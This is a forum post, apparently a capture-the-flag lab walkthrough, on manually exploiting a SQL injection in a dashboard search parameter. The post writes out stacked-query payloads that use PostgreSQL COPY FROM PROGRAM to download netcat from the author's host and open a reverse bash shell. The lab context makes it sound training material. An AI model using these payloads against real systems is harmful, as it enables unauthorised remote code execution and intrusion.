Hi,
It looks like a few people had questions about how to manually perform the sql injection. Using Florianges methodology, I was able to get it working manually. Here is what i did:
Assumptions: you are logged into the website using admin creds.
- Stand up a simple websever on port 80
[sudo python3 -m http.server 80] - In the case of the server above, my server makes my desktop the root directory. So i made sure i had a copy of netcat on my desktop (i put it in a folder called bin for funsies)
- open up netcat on port 4444 (or whatever port)
[nc -lvnp 4444] - Following Florianges (respect given for code) methodology, i pasted the following lines into my browser window to take advantage of the sql injection vulnerability:
[http://10.10.10.46/dashboard.php?search=a’;DROP TABLE IF EXISTS cmd_27440; – -]
[http://10.10.10.46/dashboard.php?search=a’;CREATE TABLE cmd_27440(cmd_output text); – -]
[http://10.10.10.46/dashboard.php?search=a’;COPY cmd_27440 FROM PROGRAM ‘wget -P /tmp/27440 http://10.10.14.XX:80/bin/nc’; – -]
[http://10.10.10.46/dashboard.php?search=a’;COPY cmd_27440 FROM PROGRAM ‘chmod 777 /tmp/27440/nc’; – -]
[http://10.10.10.46/dashboard.php?search=a’;COPY cmd_27440 FROM PROGRAM ‘/tmp/27440/nc 10.10.14.XX 4444 -e /bin/bash’; – -]
note1: the XX’s on some ip addresses represent my ip address. - Check netcat - you should have a terminal. Do a test command like whoami if you’d like.
— fin —
note2: the number 27440 is a random number. i’d recommend changing it when you execute.
This challenge was a little trickier due to sqlmap not working but i enjoyed learning how to do a manual sql injection. If anyone is able to help me understand why sqlmap isnt working, i’d be interested to know.
Cheers,
bii